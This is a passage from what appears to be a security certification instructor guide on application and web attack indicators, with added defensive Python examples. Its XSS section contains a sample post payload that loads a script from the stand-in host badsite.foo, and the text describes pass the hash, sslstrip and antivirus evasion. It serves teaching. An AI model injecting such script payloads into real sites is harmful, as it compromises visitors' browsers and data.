Without performing detailed analysis of code or process execution in real time, it is privilege escalation that provides the simplest indicator of an application attack. If process logging has been configured (varonis.com/blog/sysmon-threat-detection-guide), the audit log can provide evidence of privilege escalation attempts. These attempts may also be detected by incident response and endpoint protection agents, which will display an alert.

Lesson 14: Summarizing Secure Application Concepts | Topic 14A


Error Handling
An application attack may cause an error message. In Windows, this may be of the
following types: "Instruction could not be read or written," "Undefined exception,"
or "Process has encountered a problem." One issue for error handling is that the
application should not reveal configuration or platform details that could help an
attacker. For example, an unhandled exception on a web application might show an
error page that reveals the type and configuration of a database server.

Improper Input Handling
Most software accepts user input of some kind, whether the input is typed manually or
passed to the program by another program, such as a browser passing a URL to a web
server or a Windows process using another process via its application programming
interface. Good programming practice dictates that input should be tested to ensure
that it is valid; that is, the sort of data expected by the receiving process. Most
application attacks work by passing invalid or maliciously constructed data to the
vulnerable process. There are many ways of exploiting improper input handling, but
many attacks can be described as either overflow type attacks or injection type attacks.

Show Slide(s): Overflow Vulnerabilities

Overflow Vulnerabilities
In an overflow attack, the threat actor submits input that is too large to be stored in
a variable assigned by the application. Some of the general overflow vulnerabilities
are discussed here. To keep up to date with specific attack methods and new types of
attack, monitor a site such as OWASP (owasp.org/www-community/attacks). Ideally, the
code used to attempt these attacks will be identified by network IDS or by an endpoint
protection agent. Unsuccessful attempts may be revealed through unexplained crashes
or error messages following a file download, execution of a new app or a script, or
connection of new hardware.

Teaching Tip: To protect against software exploitation, apply security patches (for third-party applications) or secure programming practice (for your own applications). OWASP is a great resource for more detailed information. As EternalBlue shows, an exploit might use several attack techniques to compromise vulnerable code.

Buffer Overflow
A buffer is an area of memory that the application reserves to store expected data. To
exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills
the buffer. One of the most common vulnerabilities is a stack overflow. The stack is an
area of memory used by a program subroutine. It includes a return address, which is the
location of the program that called the subroutine. An attacker could use a buffer overflow
to change the return address, allowing the attacker to run arbitrary code on the system.

When executed normally, a function will return control to the calling function. If the code
is vulnerable, an attacker can pass malicious data to the function, overflow the stack,
and run arbitrary code to gain a shell on the target system.


Integer Overflow
An integer is a positive or negative number with no fractional component (a whole
number). Integers are widely used as a data type, where they are commonly defined
with fixed lower and upper bounds. An integer overflow attack causes the target
software to calculate a value that exceeds these bounds. This may cause a positive
number to become negative (changing a bank debit to a credit, for instance). It could
also be used where the software is calculating a buffer size; if the attacker is able to
make the buffer smaller than it should be, he or she may then be able to launch a
buffer overflow attack.

EternalBlue is an example of an exploit that uses vulnerabilities in integer overflow to effect
a buffer overflow and gain system privileges on a Windows host (sentinelone.com/blog/
eternalblue-nsa-developed-exploit-just-wont-die).
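As an added illustration (not from the guide), the following Python emulates the 32-bit size calculation the text describes: an attacker-supplied element count whose product wraps to a tiny buffer size, beside the checked calculation a hardened program would use. The count, element size and 32-bit width are assumptions made for the example.

```python
"""Integer overflow in a buffer-size calculation (added illustration).

Python integers never wrap, so 32-bit unsigned arithmetic is emulated here to
show what a C-style size calculation does when an attacker controls the count.
All values are constructed for the example.
"""

MASK32 = 0xFFFFFFFF


def wrap32(value):
    """Emulate storing a result in a 32-bit unsigned integer."""
    return value & MASK32


def size_fits_32bit(count, element_size):
    """True when count * element_size can be represented without wrapping."""
    return count >= 0 and element_size > 0 and count <= MASK32 // element_size


def unchecked_buffer_size(count, element_size):
    """The vulnerable calculation: the product is silently wrapped, so a huge
    count can yield a tiny buffer while the program still copies `count` items."""
    return wrap32(count * element_size)


def checked_buffer_size(count, element_size):
    """The hardened calculation: refuse any product that would wrap."""
    if not size_fits_32bit(count, element_size):
        raise OverflowError("buffer size calculation overflows 32 bits")
    return count * element_size


def copy_into_buffer(buffer_size, data):
    """Bounds-checked copy, the step a safe program performs before writing.
    Raises instead of writing past the end of the buffer."""
    if len(data) > buffer_size:
        raise OverflowError(f"{len(data)} bytes do not fit in {buffer_size}")
    buf = bytearray(buffer_size)
    buf[:len(data)] = data
    return buf


def demo():
    # Attacker-controlled count: 0x40000001 elements of 4 bytes. The true
    # product is 0x100000004 (just over 4 GiB); in 32 bits it wraps to 4.
    count, element_size = 0x40000001, 4
    wrapped = unchecked_buffer_size(count, element_size)
    try:
        checked_buffer_size(count, element_size)
        verdict = "accepted"
    except OverflowError:
        verdict = "rejected"
    return {"wrapped_size": wrapped, "true_size": count * element_size,
            "checked": verdict}


if __name__ == "__main__":
    print(demo())
```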

Show Slide(s): Null Pointer Dereferencing and Race Conditions

Null Pointer Dereferencing and Race Conditions
In C/C++ programming, a pointer is a variable that stores a memory location, rather
than a value. Attempting to read or write that memory address via the pointer is called
dereferencing. If the memory location is invalid or null (perhaps by some malicious
process altering the execution environment), this creates a null pointer dereference
type of exception and the process will crash, probably. In some circumstances, this
might also allow a threat actor to run arbitrary code. Programmers can use logic
statements to test that a pointer is not null before trying to use it.

Teaching Tip: Note that dereferencing does not mean "deleting" or "removing;" it means "read" or "resolve." The code is taking a reference to a memory address and returning the value. A null pointer exception occurs when this reference value is null or invalid.

A race condition is one means of engineering a null pointer dereference exception.
Race conditions occur when the outcome from an execution process is directly
dependent on the order and timing of certain events, and those events fail to execute
in the order and timing intended by the developer. In 2016, the Linux kernel was
discovered to have an exploitable race condition vulnerability, known as Dirty COW
(theregister.com/2016/10/21/linux_privilege_escalation_hole).
Race condition attacks can also be directed at databases and file systems. A time
of check to time of use (TOCTTOU) race condition occurs when there is a change
between when an app checked a resource and when the app used the resource. This
change invalidates the check. An attacker that can identify a TOCTTOU vulnerability
will attempt to manipulate data after it has been checked but before the application
can use this data to perform some operation. For example, if an application creates a
temporary file to store a value for later use, and an attacker can replace or delete this
file between the time it is created and the time it is used, then the attacker is exploiting
a TOCTTOU vulnerability.
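The temporary-file TOCTTOU case above, as an added Python example that is not part of the guide: the check-then-open pattern has its file swapped for a symlink between the check and the use, while the safe variant opens once without following links and validates the open descriptor instead of the name. It assumes a POSIX system (symlinks, O_NOFOLLOW, an effective UID) and uses paths constructed in a scratch directory.

```python
"""Time-of-check to time-of-use (TOCTTOU) on a temporary file (added illustration).

The vulnerable reader validates a path and then reopens it by name; anything
that replaces the file in that window is what gets read. The safe reader opens
once, refuses to follow a symlink, and checks the descriptor it holds, so there
is no second lookup for a check to go stale against. POSIX only.
"""
import os
import stat
import tempfile


def read_temp_value_vulnerable(path):
    """Check-then-use: two separate lookups of the same name."""
    if not os.path.isfile(path):          # time of check
        raise FileNotFoundError(path)
    with open(path, "rb") as fh:          # time of use: a fresh lookup by name
        return fh.read()


def read_temp_value_safe(path):
    """Open once without following symlinks, then validate the descriptor."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)   # ELOOP if path is a symlink
    try:
        st = os.fstat(fd)                 # properties of what we actually opened
        if not stat.S_ISREG(st.st_mode):
            raise OSError("not a regular file")
        if st.st_uid != os.geteuid():
            raise OSError("file is not owned by this process")
        with os.fdopen(fd, "rb") as fh:
            fd = -1                       # the file object now owns the descriptor
            return fh.read()
    finally:
        if fd != -1:
            os.close(fd)


def demo():
    """Model the race in a scratch directory: the app's temp file passes the
    check, then is swapped for a symlink to a file of the attacker's choosing
    before it is used. Returns what each reader produced."""
    with tempfile.TemporaryDirectory() as workdir:
        victim = os.path.join(workdir, "value.tmp")     # constructed paths
        secret = os.path.join(workdir, "secret.txt")
        with open(victim, "wb") as fh:
            fh.write(b"expected-value")
        with open(secret, "wb") as fh:
            fh.write(b"attacker-chosen-content")
        untouched = read_temp_value_safe(victim)        # genuine file opens fine
        checked = os.path.isfile(victim)                # time of check passes ...
        os.remove(victim)                               # ... then the swap happens
        os.symlink(secret, victim)
        leaked = read_temp_value_vulnerable(victim)     # reads secret.txt instead
        try:
            read_temp_value_safe(victim)
            safe_outcome = "opened"
        except OSError:
            safe_outcome = "refused"                    # O_NOFOLLOW rejects the link
    return {"checked": checked, "untouched": untouched,
            "vulnerable_read": leaked, "safe_outcome": safe_outcome}


if __name__ == "__main__":
    print(demo())
```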

Show Slide(s): Memory Leaks and Resource Exhaustion

Memory Leaks and Resource Exhaustion
If a process is operating correctly, when it no longer requires a block of memory, it
should release it. If the program code does not do this, it could create a situation
where the system continually leaks memory to the faulty process. This means less
memory is available to other processes and the system could crash. Memory leaks
are particularly serious in service/background applications, as they will continue
to consume memory over an extended period. Memory leaks in the OS kernel
are also extremely serious. A memory leak may itself be a sign of a malicious or
corrupted process.
More generally, a malicious process might cause denial of service or set up the
conditions for privilege escalation via resource exhaustion. Resources refers to
CPU time, system memory allocation, fixed disk capacity, and network utilization. A
malicious process could spawn multiple looping threads to use up CPU time, or write
thousands of files to disk. Distributed attacks against network applications perform a
type of resource exhaustion attack by starting but not completing sessions, causing
the application to fill up its state table, leaving no opportunities for genuine clients
to connect.

Show Slide(s): DLL Injection and Driver Manipulation

DLL Injection and Driver Manipulation
A dynamic link library (DLL) is a binary package that implements some sort of standard
functionality, such as establishing a network connection or performing cryptography.
The main process of a software application is likely to load several DLLs during the
normal course of operations.

Teaching Tip: Stress to students that like any file, DLLs and drivers should only be run or installed if they are signed with a valid certificate from a reputable vendor.

DLL injection is a vulnerability in the way the operating system allows one process to
attach to another. This functionality can be abused by malware to force a legitimate
process to load a malicious link library. The link library will contain whatever functions
the malware author wants to be able to run. Malware uses this technique to move from
one host process to another to avoid detection. A process that has been compromised
by DLL injection might open unexpected network connections, or interact with files and
the registry suspiciously.
To perform DLL injection, the malware must already be operating with sufficient
privileges, typically local administrator or system privileges. It must also evade
detection by antivirus software. One means of doing this is code refactoring.
Refactoring means that the code performs the same function by using different
methods (control blocks, variable types, and so on). Refactoring means that the A-V
software may no longer identify the malware by its signature.
OS function calls to allow DLL injection are legitimately used for operations such
as debugging and monitoring. Another opportunity for malware authors to exploit
these calls is the Windows Application Compatibility framework. This allows legacy
applications written for an OS, such as Windows XP, to run on later versions. The code
library that intercepts and redirects calls to enable legacy mode functionality is called a
shim. The shim must be added to the registry and its files packed in a shim database
(.SDB) file added to the system folder. The shim database represents a way that
malware with local administrator privileges can run on reboot (persistence).

Show Slide(s): Pass the Hash Attack

Pass the Hash Attack
A threat actor has to be either relatively lucky to find an unpatched vulnerability, or
well-resourced enough to develop a zero-day exploit. Once an initial foothold has been
gained, the threat actor may try to find simpler ways to move around the network.

Teaching Tip: You might also want to mention golden ticket attacks (youtube.com/watch?v=lJQn06QLwEw). If students are interested in learning more about Pass the Hash and ticket forging, refer them to the briefing here: media.blackhat.com/bh-us-12/Briefings/Duckwall/BH_US_12_Duckwall_Campbell_Still_Passing_WP.pdf

Attackers can extend their lateral movement by a great deal if they are able to
compromise host credentials. One common credential exploit technique for lateral
movement is called pass the hash (PtH). This is the process of harvesting an account's
cached credentials when the user is logged into a single sign-on (SSO) system so the
attacker can use the credentials on other systems. If the threat actor can obtain the
hash of a user password, it is possible to present the hash (without cracking it) to
authenticate to network protocols such as the Windows File Sharing protocol Server
Message Block (SMB), and other protocols that accept NTLM hashes as authentication
credentials. For example, most Windows domain networks are configured to allow
NTLM as a legacy authentication method for services. The attacker's access isn't just
limited to a single host, as they can pass the hash onto any computer in the network
that is tied to the domain. This drastically cuts down on the effort the threat actor must
spend in moving from host to host.


Pass the hash is relatively difficult to detect, as it exploits legitimate network behavior.
A detection system can be configured to correlate a sequence of security log events
using NTLM-type authentication, but this method can be prone to false positives
(blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/).

The pass the hash process. (Images © 123RF.com.)
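One way to do the correlation just described, as an added example rather than anything from the guide or the linked article: a toy detector over constructed Windows Security event 4624 (successful logon) records that alerts when one account's NTLM network logons reach several distinct hosts inside a short window. The record format, the five-minute window and the three-host threshold are assumptions for the example; the false-positive caveat in the text still applies, so a real deployment would tune these and suppress known NTLM-dependent service accounts.

```python
"""Correlating NTLM network logons across hosts (added illustration).

Input is a constructed, whitespace-separated extract of event 4624 fields:
timestamp, target host, account, Logon Type, Authentication Package.
Logon Type 3 is a network logon; NTLM as the package is the mode the text
says these attacks rely on. Pure Python, no external dependencies.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not from any real log).
SAMPLE_EVENTS = """\
2021-08-30T10:00:05 FS01   CORP\\jsmith   3 NTLM
2021-08-30T10:00:41 APP02  CORP\\jsmith   3 NTLM
2021-08-30T10:01:12 DB01   CORP\\jsmith   3 NTLM
2021-08-30T10:02:30 WKS17  CORP\\jsmith   3 NTLM
2021-08-30T10:03:00 FS01   CORP\\svc_bk   3 NTLM
2021-08-30T10:05:00 FS01   CORP\\svc_bk   3 NTLM
2021-08-30T10:06:00 APP02  CORP\\alee     3 Kerberos
2021-08-30T10:07:00 WKS03  CORP\\alee     2 Negotiate
"""


def parse_events(text):
    """Turn the extract into a list of dicts, one per 4624 record."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, account, logon_type, package = line.split()
        events.append({
            "time": datetime.fromisoformat(ts),
            "host": host,
            "account": account,
            "logon_type": int(logon_type),
            "package": package,
        })
    return events


def ntlm_network_logons(events):
    """Keep only network logons that authenticated with the NTLM package."""
    return [e for e in events if e["logon_type"] == 3 and e["package"] == "NTLM"]


def detect_lateral_ntlm(events, window=timedelta(minutes=5), min_hosts=3):
    """Return {account: sorted hosts} for every account whose NTLM network
    logons touch at least `min_hosts` distinct hosts inside some `window`.
    Uses a sliding window over each account's time-ordered logons."""
    by_account = defaultdict(list)
    for e in sorted(ntlm_network_logons(events), key=lambda e: e["time"]):
        by_account[e["account"]].append(e)
    alerts = {}
    for account, seq in by_account.items():
        start = 0
        for end in range(len(seq)):
            while seq[end]["time"] - seq[start]["time"] > window:
                start += 1                      # drop logons older than the window
            hosts = {e["host"] for e in seq[start:end + 1]}
            if len(hosts) >= min_hosts:
                alerts[account] = sorted(hosts)  # report the first triggering set
                break
    return alerts


if __name__ == "__main__":
    for account, hosts in detect_lateral_ntlm(parse_events(SAMPLE_EVENTS)).items():
        print(f"ALERT {account}: NTLM network logons to {hosts} within 5 minutes")
```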


Review Activity:
Indicators of Application Attacks
Answer the following questions:

1. Your log shows that the Notepad process on a workstation running as
the local administrator account has started an unknown process on an
application server running as the SYSTEM account. What type of attack(s)
are represented in this intrusion event?

The Notepad process has been compromised, possibly using buffer overflow or a DLL
process injection attack. The threat actor has then performed lateral movement and
privilege escalation, gaining higher privileges through remote code execution on the
application server.

2. How might an integer overflow be used as part of a buffer overflow?

The integer value could be used to allocate less memory than a process expects,
making a buffer overflow easier to achieve.

3. You are providing security advice and training to a customer's technical
team. One asks how they can identify when a buffer overflow occurs. What
is your answer?

Real-time detection of a buffer overflow is difficult, and is typically only achieved by
security monitoring software (antivirus, endpoint detection and response, or user
and entity behavior analytics) or by observing the host closely within a sandbox. An
unsuccessful attempt is likely to cause the process to crash with an error message. If
the attempt is successful, the process is likely to show anomalous behavior, such as
starting another process, opening network connections, or writing to AutoRun keys in
the registry. These indicators can be recorded using logging and system monitoring
tools.

4. What is the effect of a memory leak?

A process claims memory locations but never releases them, reducing the amount of
memory available to other processes. This will damage performance, could prevent
other processes from starting, and if left unchecked could crash the OS.

5. How can DLL injection be exploited to hide the presence of malware?

Various OS system functions allow one process to manipulate another and force it to
load a dynamic link library (DLL). This means that the malware code can be migrated
from one process to another, evading detection.

6. Other than endpoint protection software, what resource can provide
indicators of pass the hash attacks?

These attacks are revealed by use of certain modes of NTLM authentication within the
security (audit) log of the source and target hosts. These indicators can be prone to
false positives, however, as many services use NTLM authentication legitimately.


Topic 14B
Analyze Indicators of Web Application Attacks

EXAM OBJECTIVES COVERED
1.3 Given a scenario, analyze potential indicators associated with application attacks

Teaching Tip: This topic deals with the remainder of the application attack content examples, which mostly refer to web application server and client vulnerabilities and exploits.

A web application exposes many interfaces to public networks. Attackers can exploit
vulnerabilities in server software and in client browser security to perform injection
and session hijacking attacks that compromise data confidentiality and integrity.
Understanding the vectors and vulnerabilities exploited by these attacks will help
you to identify and remediate configuration weaknesses in your systems.

Show Slide(s): Uniform Resource Locator Analysis

Uniform Resource Locator Analysis
As well as pointing to the host or service location on the Internet (by domain name
or IP address), a uniform resource locator (URL) can encode some action or data to
submit to the server host. This is a common vector for malicious activity.

Teaching Tip: Make sure students can interpret the parts of a URL and are familiar with the general process of HTTP requests and responses and methods.

Uniform resource locator (URL) analysis.

HTTP Methods
As part of URL analysis, it is important to understand how HTTP operates. An HTTP
session starts with a client (a user-agent, such as a web browser) making a request to
an HTTP server. The request first establishes a TCP connection. This TCP connection can
be used for multiple requests, or a client can start new TCP connections for different
requests. A request typically comprises a method, a resource (such as a URL path),
version number, headers, and body. The principal method is GET, used to retrieve a
resource. Other methods include:

• POST—send data to the server for processing by the requested resource.
• PUT—create or replace the resource. DELETE can be used to remove the resource.
• HEAD—retrieve the headers for a resource only (not the body).
Data can be submitted to a server either by using a POST or PUT method and the HTTP
headers and body, or by encoding the data within the URL used to access the resource.
Data submitted via a URL is delimited by the ? character, which follows the resource
path. Query parameters are usually formatted as one or more name=value pairs,
with ampersands delimiting each pair. A URL can also include a fragment or anchor
ID, delimited by #. The fragment is not processed by the web server. An anchor ID is
intended to refer to a section of a page but can be misused to inject JavaScript.
The server response comprises the version number and a status code and message, plus
optional headers, and message body. An HTTP response code is the header value returned
by a server when a client requests a URL, such as 200 for "OK" or 404 for "Not Found."

Percent Encoding
A URL can contain only unreserved and reserved characters from the ASCII set.
Reserved ASCII characters are used as delimiters within the URL syntax and should only
be used unencoded for those purposes. The reserved characters are:
: / ? # [ ] @ ! $ & ' ( ) * + , ; =
There are also unsafe characters, which cannot be used in a URL. Control characters,
such as null string termination, carriage return, line feed, end of file, and tab, are
unsafe. Percent encoding allows a user-agent to submit any safe or unsafe character
(or binary data) to the server within the URL. Its legitimate uses are to encode reserved
characters within the URL when they are not part of the URL syntax and to submit
Unicode characters. Percent encoding can be misused to obfuscate the nature of a URL
(encoding unreserved characters) and submit malicious input. Percent encoding can
exploit weaknesses in the way the server application performs decoding. Consequently,
URLs that make unexpected or extensive use of percent encoding should be treated
carefully. You can use a resource such as W3 Schools (w3schools.com/tags/ref_
urlencode.asp) for a complete list of character codes, but it is helpful to know some of
the characters most widely used in exploits.

Character               Percent Encoding
null                    %00
space                   %20
CR (Carriage Return)    %0D
LF (Line Feed)          %0A
+                       %2B
%                       %25
/                       %2F
\                       %5C
.                       %2E
?                       %3F
"                       %22
'                       %27
<                       %3C
>                       %3E
&                       %26
|                       %7C
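An added Python example (not from the guide) that applies the table above: it splits a URL into path, query and fragment, decodes the query, and reports the encodings that warrant a closer look (encoded control characters, percent-encoded unreserved characters, encoded markup characters, and double encoding). The sample URLs and the finding categories are the example's own.

```python
"""URL analysis with percent-encoding checks (added illustration).

Standard library only. The findings are heuristics built from the guide's
table: control characters (%00, %0D, %0A, %09), unreserved characters that
never need encoding (obfuscation), markup characters (< > " ') that often
signal script injection, and %25 followed by two hex digits (double encoding
aimed at a decoder that runs more than once).
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PCT = re.compile(r"%([0-9A-Fa-f]{2})")
HEX2 = re.compile(r"[0-9A-Fa-f]{2}")
UNRESERVED = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
                 "0123456789-._~")
CONTROL_CODES = {"00": "null", "0D": "carriage return",
                 "0A": "line feed", "09": "tab"}
MARKUP_CODES = {"3C": "<", "3E": ">", "22": '"', "27": "'"}


def encoding_findings(raw):
    """List human-readable findings about the percent escapes in `raw`."""
    findings = []
    for m in PCT.finditer(raw):
        code = m.group(1).upper()
        if code in CONTROL_CODES:
            findings.append(f"encoded {CONTROL_CODES[code]} (%{code})")
        elif code in MARKUP_CODES:
            findings.append(f"encoded markup character {MARKUP_CODES[code]} (%{code})")
        elif chr(int(code, 16)) in UNRESERVED:
            findings.append(f"unreserved character encoded as %{code}")
        elif code == "25" and HEX2.match(raw, m.end()):
            findings.append("double encoding (%25 followed by two hex digits)")
    return findings


def analyze_url(url):
    """Break a URL into the parts the text describes and attach findings.
    The fragment is never sent to the server, but client-side scripts may
    read it, so it is decoded and inspected as well."""
    parts = urlsplit(url)
    raw = parts.path + "?" + parts.query + "#" + parts.fragment
    return {
        "host": parts.hostname,
        "path": unquote(parts.path),
        "query": parse_qsl(parts.query, keep_blank_values=True),
        "fragment": unquote(parts.fragment),
        "findings": encoding_findings(raw),
    }


if __name__ == "__main__":
    # Constructed sample: a benign request beside one that hides a null byte
    # and a double-encoded traversal sequence in its parameters.
    for sample in ("https://trusted.foo/messages?user=james&page=2",
                   "https://trusted.foo/files?name=report%2E%70df%00&x=%252e%252e%2F"):
        print(analyze_url(sample))
```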


Show Slide(s): Application Programming Interface Attacks

Application Programming Interface Attacks
Web applications and cloud services implement application program interfaces (APIs)
to allow consumers to automate services. An API call might use the following general
URL format:

https://webapp.foo/?Action=RunInstance&Id=123&Count=1&InstanceAccessKey=MyInstanceAccessKey&Placement=us-east&MyAuthorizationToken

Teaching Tip: Make sure students can identify the general format of an API call.

If the API isn't secure, threat actors can easily take advantage of it to compromise the
services and data stored on the web application. An API must only be used over an
encrypted channel (HTTPS). API calls over plain HTTP are not secure and could easily be
impersonated or modified by a third party. Some other common attacks against APIs
target the following weaknesses and vulnerabilities:
• Ineffective secrets management, allowing threat actors to discover an API key and
perform any action authorized to that key.

• Lack of input validation, allowing the threat actor to insert arbitrary parameters into
API methods and queries. This is often referred to as allowing unsanitized input.

• Error messages revealing clues to a potential adversary. For example, an
authentication error should not reveal whether a valid username has been rejected
because of an invalid password. The error should simply indicate an authentication
failure.

• Denial of service (DoS) by bombarding the API with spurious calls. Protection against
this attack can be provided through throttling/rate-limiting mechanisms.

Show Slide(s): Replay Attacks

Replay Attacks
Session management enables web applications to uniquely identify a user across
a number of different actions and requests. Session management is particularly
important when it comes to user authentication, as it is required to ensure the integrity
of the account and the confidentiality of data associated with it. Session management
is often vulnerable to different kinds of replay attack. To establish a session, the
server normally gives the client some type of token. A replay attack works by
sniffing or guessing the token value and then submitting it to re-establish the session
illegitimately.

Teaching Tip: Note that replay depends on weak session management tokens.

HTTP is nominally a stateless protocol, meaning that the server preserves no
information about the client, but mechanisms such as cookies have been developed
to preserve stateful data. A cookie is created when the server sends an HTTP response
header with the cookie data. A cookie has a name and value, plus optional security and
expiry attributes. Subsequent request headers sent by the client will usually include
the cookie. Cookies are either nonpersistent (session) cookies, in which case they are
stored in memory and deleted when the browser instance is closed, or persistent, in
which case they are stored in the browser cache until deleted by the user or pass a
defined expiration date.
If cookies are used to store confidential information, the web application should
encrypt them before sending them to the client. If using TLS, information in a cookie
would be secure in transit but reside on the client computer in plaintext, unless it had
been separately encrypted. The value can be any URL-safe encoded string in whatever
format and structure the application uses for parsing.


Viewing cookies set by Google's home page using the Firefox browser's Inspector tools. These cookies
are not used for authentication, but they do track whether the user has visited the site before. The
CONSENT cookie tracks whether the user has agreed to the terms and conditions of use.

Show Slide(s): Session Hijacking and Cross-Site Request Forgery (2)

Session Hijacking and Cross-Site Request Forgery
In the context of a web application, session hijacking most often means replaying a
cookie in some way. Attackers can sniff network traffic to obtain session cookies sent
over an unsecured network, like a public Wi-Fi hotspot. To counter cookie hijacking,
you can encrypt cookies during transmission, delete cookies from the client's browser
cache when the client terminates the session, and design your web app to deliver a
new cookie with each new session between the app and the client's browser.

Teaching Tip: Note that a client-side attack is where the browser runs the malicious code. This might trigger some action on the server, but it is client-side because the browser is coding the request.

Session prediction attacks focus on identifying possible weaknesses in the generation
of session tokens that will enable an attacker to predict future valid session values. If
an attacker can predict the session token, then the attacker can take over a session
that has yet to be established. A session token must be generated using a non-
predictable algorithm, and it must not reveal any information about the session client.
In addition, proper session management dictates that apps limit the lifespan of a
session and require reauthentication after a certain period.

Cross-Site Request Forgery


A client-side or cross-site request forgery (CSRF or XSRF) can exploit applications
that use cookies to authenticate users and track sessions. To work, the attacker must
convince the victim to start a session with the target site. The attacker must then pass
an HTTP request to the victim's browser that spoofs an action on the target site, such
as changing a password or an email address. This request could be disguised in a few
ways and so could be accomplished without the victim necessarily having to click a
link. If the target site assumes that the browser is authenticated because there is a
valid session cookie and doesn't complete any additional authorization process on the
attacker's input (or if the attacker is able to spoof the authorization), it will accept the
input as genuine. This is also referred to as a confused deputy attack (the point being
that the user and the user's browser are not necessarily the same thing).
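The session-token and CSRF points above (non-predictable tokens, a limited session lifespan, and an authorization step beyond "a valid cookie arrived") as one added Python example that is not from the guide. The cookie name, token length, 30-minute lifetime and the per-session anti-forgery token compared on every state-changing request are assumptions made for the example.

```python
"""Session tokens, cookie attributes and a CSRF check (added illustration).

Server state is an in-memory dict. Session ids come from the OS CSPRNG, so
nothing about the user or the time can be derived from them; the session
expires after a fixed lifetime; and a password change is only honoured when
the request carries the anti-forgery token that only the genuine form knows.
"""
import hmac
import secrets
from datetime import datetime, timedelta

SESSION_LIFETIME = timedelta(minutes=30)   # assumption: reauthenticate after 30 min
_sessions = {}                             # session_id -> {"user", "expires", "csrf"}


def create_session(user, now):
    """Issue an unpredictable session id and a matching anti-forgery token."""
    session_id = secrets.token_urlsafe(32)             # 256 bits from the CSPRNG
    _sessions[session_id] = {
        "user": user,
        "expires": now + SESSION_LIFETIME,
        "csrf": secrets.token_urlsafe(32),
    }
    return session_id


def session_cookie_header(session_id):
    """Set-Cookie for a nonpersistent session cookie (no Expires/Max-Age) that
    is sent only over TLS, hidden from scripts, and withheld from cross-site
    requests."""
    return f"Set-Cookie: sid={session_id}; Secure; HttpOnly; SameSite=Strict; Path=/"


def lookup_session(session_id, now):
    """Return the live session for an id, or None if unknown or expired."""
    sess = _sessions.get(session_id)
    if sess is None:
        return None
    if now >= sess["expires"]:
        _sessions.pop(session_id, None)   # expired: the user must log in again
        return None
    return sess


def csrf_token_for(session_id, now):
    """Token the server embeds in its own forms for this session."""
    sess = lookup_session(session_id, now)
    if sess is None:
        raise PermissionError("no valid session")
    return sess["csrf"]


def handle_change_password(cookie_sid, form_token, now):
    """Server side of a state-changing request. A forged cross-site request
    can carry the victim's cookie but cannot read the token embedded in the
    genuine form, so the constant-time comparison fails and it is refused."""
    sess = lookup_session(cookie_sid, now)
    if sess is None:
        return "denied: not authenticated"
    if not hmac.compare_digest(sess["csrf"], form_token or ""):
        return "denied: missing or invalid anti-forgery token"
    return f"ok: password changed for {sess['user']}"


def demo():
    """Walk through the exchange at fixed times so the outcome is deterministic."""
    t0 = datetime(2021, 8, 30, 9, 0, 0)           # constructed login time
    sid = create_session("alice", t0)
    token = csrf_token_for(sid, t0)
    return {
        "cookie": session_cookie_header(sid),
        "genuine_form": handle_change_password(sid, token, t0),
        "forged_request": handle_change_password(sid, "", t0),        # cookie only
        "guessed_token": handle_change_password(sid, "a" * 43, t0),
        "after_timeout": handle_change_password(sid, token, t0 + timedelta(minutes=31)),
        "unknown_cookie": handle_change_password("not-a-real-sid", token, t0),
        "unique_ids": len({create_session("bob", t0) for _ in range(50)}),
    }


if __name__ == "__main__":
    for step, result in demo().items():
        print(f"{step}: {result}")
```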


Cross-site request forgery example. (Images © 123RF.com.)

Clickjacking
Clickjacking is an attack where what the user sees and trusts as a web application
with some sort of login page or form contains a malicious layer or invisible iFrame
that allows an attacker to intercept or redirect user input. Clickjacking can be launched
using any type of compromise that allows the adversary to run arbitrary code as a
script. Clickjacking can be mitigated by using HTTP response headers that instruct the
browser not to open frames from different origins (domains) and by ensuring that any
buttons or input boxes on a page are positioned on the top-most layer.

SSL Strip
A Secure Sockets Layer (SSL) strip attack is launched against clients on a local network
as they try to make connections to websites. The threat actor must first perform a
Man-in-the-Middle attack via ARP poisoning to masquerade as the default gateway.
When a client requests an HTTP site that redirects to an HTTPS site in an unsafe way,
the sslstrip utility (tools.kali.org/information-gathering/sslstrip) proxies the request and
response, serving the client the HTTP site, hopefully with an unencrypted login form. If
the user enters credentials, they will be captured by the threat actor. Sites can use the
HTTP Strict Transport Security (HSTS) lists maintained by browsers to prevent clients
requesting HTTP in the first place.

Show Slide(s): Cross-Site Scripting

Teaching Tip: Make sure students can identify code that performs XSS. Also check that students understand the difference between XSRF and XSS. XSRF spoofs a specific request against the web application; XSS is a means of running any arbitrary code. An XSS attack could be used to perform XSRF, for instance.

Cross-Site Scripting
Web applications depend on scripting, and most websites these days are web
applications rather than static web pages. If the user attempts to disable scripting,
very few sites will be left available. A cross-site scripting (XSS) attack exploits the fact
that the browser is likely to trust scripts that appear to come from a site the user has
chosen to visit. XSS inserts a malicious script that appears to be part of the trusted site.
A nonpersistent type of XSS attack would proceed as follows:
1. The attacker identifies an input validation vulnerability in the trusted site.


2. The attacker crafts a URL to perform a code injection against the trusted site. This
could be coded in a link from the attacker's site to the trusted site or a link in an
email message.

3. When the user clicks the link, the trusted site returns a page containing the
malicious code injected by the attacker. As the browser is likely to be configured
to allow the site to run scripts, the malicious code will execute.

The malicious code could be used to deface the trusted site (by adding any sort of
arbitrary HTML code), steal data from the user's cookies, try to intercept information
entered into a form, perform a request forgery attack, or try to install malware. The
crucial point is that the malicious code runs in the client's browser with the same
permission level as the trusted site.
An attack where the malicious input comes from a crafted link is a reflected or
nonpersistent XSS attack. A stored/persistent XSS attack aims to insert code into a
back-end database or content management system used by the trusted site. For
example, the attacker may submit a post to a bulletin board with a malicious script
embedded in the message. When other users view the message, the malicious script
is executed. For example, with no input sanitization, a threat actor could type the
following into a new post text field:

Check out this amazing <a href="https://trusted.foo">website</a><script src="https://badsite.foo/hook.js"></script>.

Users viewing the post will have the malicious script hook.js execute in their browser.
A third type of XSS attack exploits vulnerabilities in client-side scripts. Such scripts often
use the Document Object Model (DOM) to modify the content and layout of a web
page. For example, the "document.write" method enables a page to take some user
input and modify the page accordingly. An exploit against a client-side script could
work as follows:
1. The attacker identifies an input validation vulnerability in the trusted site. For
example, a message board might take the user's name from an input text box
and show it in a header.

